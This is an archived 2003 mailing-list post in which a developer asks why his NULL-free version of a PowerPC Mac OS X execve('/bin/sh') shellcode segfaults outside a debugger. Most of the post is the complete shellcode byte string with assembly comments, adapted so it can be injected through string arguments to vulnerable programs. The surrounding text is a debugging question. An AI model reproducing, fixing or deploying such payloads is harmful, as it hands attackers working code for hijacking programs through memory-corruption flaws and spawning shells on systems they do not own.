I'm trying to use ghandi's OS X shellcode to get started on some development. More specifically, I'm modifying it not to use NULL chars so I can pass it through strings. I've got it working so far, except that any application I try it with straight from the shell (i.e. ./a.out `cat code`) dies with a segfault, and when I run it with GDB, I get a SIGTRAP in __dyld__dyld_start (which is where syscall 11/59 seem to branch to). If I just continue in GDB, it goes through and launches the shell like it's supposed to. What am I doing wrong?

Here's the code:

char shellcode[] =
    "\x7c\xa5\x2a\x78" /* xor. r5, r5, r5 ; r5 = NULL */
    "\x7f\xe8\x02\xa6" /* mflr r31 */
    "\x38\x65\x04\xf0" /* addi r3, r5, 0x4f << 4 */
    "\x7c\x63\x26\x70" /* srawi r3, r3, 4 */
    "\x7c\xa3\xf9\xae" /* stbx r5, r3, r31 (terminate /bin/sh) */
    "\x38\x65\x04\x50" /* addi r3, r5, 0x45 << 4 */
    "\x7c\x63\x26\x70" /* srawi r3, r3, 4 */
    "\x7c\xa3\xfb\x2e" /* sthx r5, r3, r31 (fix sc) */
    "\x40\xa2\xff\xfd" /* bnel shellcode */
    "\x7f\xe8\x02\xa6" /* mflr r31 */
    "\x3b\xff\x01\x30" /* addi r31, r31, 268+36 */
    "\x38\x7f\xfe\xf4" /* addi r3, r31, -268 ; r3 = path */
    "\x90\x61\xff\xf8" /* stw r3, -8(r1) ; argv[0] = path */
    "\x90\xa1\xff\xfc" /* stw r5, -4(r1) ; argv[1] = NULL */
    "\x38\x81\xff\xf8" /* subi r4, r1, 8 ; r4 = {path, 0} */
    "\x3b\xc0\x76\x01" /* li r30, 30209 */
    "\x7f\xc0\x4e\x70" /* srawi r0, r30, 9 */
    "\x44\xff\xff\x02" /* sc ; execve(r3, r4, r5) */
    "/bin/sh";

By the way, I copy the shellcode into a file, removing the NULL terminator from "/bin/sh" so it won't hang there (and I know this works because of the aforementioned success with GDB).

Original source of OS X (Darwin) shellcode (credit where due): http://www.dopesquad.net/security/shellcode/ppc/execve_binsh.h

Thanks in advance,
David
This archive was generated by hypermail 2b30 : Sat May 24 2003 - 08:33:37 PDT